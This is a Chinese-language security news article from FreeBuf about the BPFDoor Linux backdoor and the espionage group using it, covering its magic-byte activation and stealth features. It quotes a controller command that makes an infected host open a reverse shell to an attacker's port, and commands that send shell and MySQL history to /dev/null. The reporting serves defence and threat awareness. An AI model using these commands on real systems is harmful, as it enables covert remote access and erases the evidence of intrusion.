官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
高级隐蔽后门威胁多国企业
一种名为BPFDoor的复杂后门恶意软件正在亚洲、中东和非洲地区活跃攻击各类组织,该软件采用高级隐蔽技术规避检测。这款Linux后门利用伯克利包过滤(BPF)技术在内核层面监控网络流量,使其能够躲过常规安全扫描,同时维持对被入侵系统的持久访问。
近期攻击记录显示,BPFDoor主要针对电信、金融和零售行业,受害者分布在韩国、香港、缅甸、马来西亚和埃及等地。
无端口监听特性增加检测难度
该恶意软件无需监听网络端口即可运行,这使得传统的端口扫描等安全措施难以发现其存在,导致其能够长期潜伏。趋势科技研究人员将攻击者追踪为Earth Bluecrow(又名Red Menshen),这是一个使用BPFDoor进行网络间谍活动的高级持续性威胁(APT)组织。
根据遥测数据,该组织已活跃至少四年,最早可追溯到2021年的多起事件。BPFDoor的设计使其能够向操作系统内核注入BPF过滤器,通过检查网络数据包并在收到特定"魔法序列"(触发后门功能的预定字节模式)时激活。
这种类Rootkit功能使BPFDoor能够伪装系统进程名称并采用其他规避策略,完美融入系统环境。对于受感染组织而言,该后门会建立持久且几乎不可见的通道,使攻击者能够长期访问敏感数据和系统,成为长期间谍活动的理想工具。
反向Shell机制:隐藏控制核心
BPFDoor的核心能力来自其控制器模块,该模块允许攻击者与受感染主机建立反向Shell连接。此功能使威胁行为者能够深入渗透被入侵网络,实现横向移动并访问更多系统和敏感数据。
控制器发送的激活数据包包含:
- 魔法字节(如TCP协议使用0x5293,UDP协议使用0x7255)
- 目标连接所需的远程IP地址和端口
- 身份验证密码
反向连接模式流程图(来源:趋势科技)
当配置正确时,这将从受害机器向攻击者系统发起反向Shell连接。
`./controller -cd 22 -h 192.168.32.156 -ms 8000`
该命令指示控制器要求受感染机器(192.168.32.156)向攻击者机器的8000端口发起反向Shell连接。
清除攻击痕迹的恶意设计
恶意软件作者还加入了清除系统活动痕迹的措施:
`export MYSQL_HISTFILE=/dev/null export HISTFILE=/dev/null`
这些命令会禁用命令历史记录,表明攻击者专门针对运行MySQL数据库软件的系统。
由于BPFDoor能够跨多种协议(TCP、UDP和ICMP)运行,且攻击者可轻松修改用于激活的魔法字节序列,网络防御人员检测该威胁仍面临挑战。随着该威胁持续演变,各组织必须部署能够检测BPFDoor通信和激活序列特定模式的高级监控解决方案。
参考来源:
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)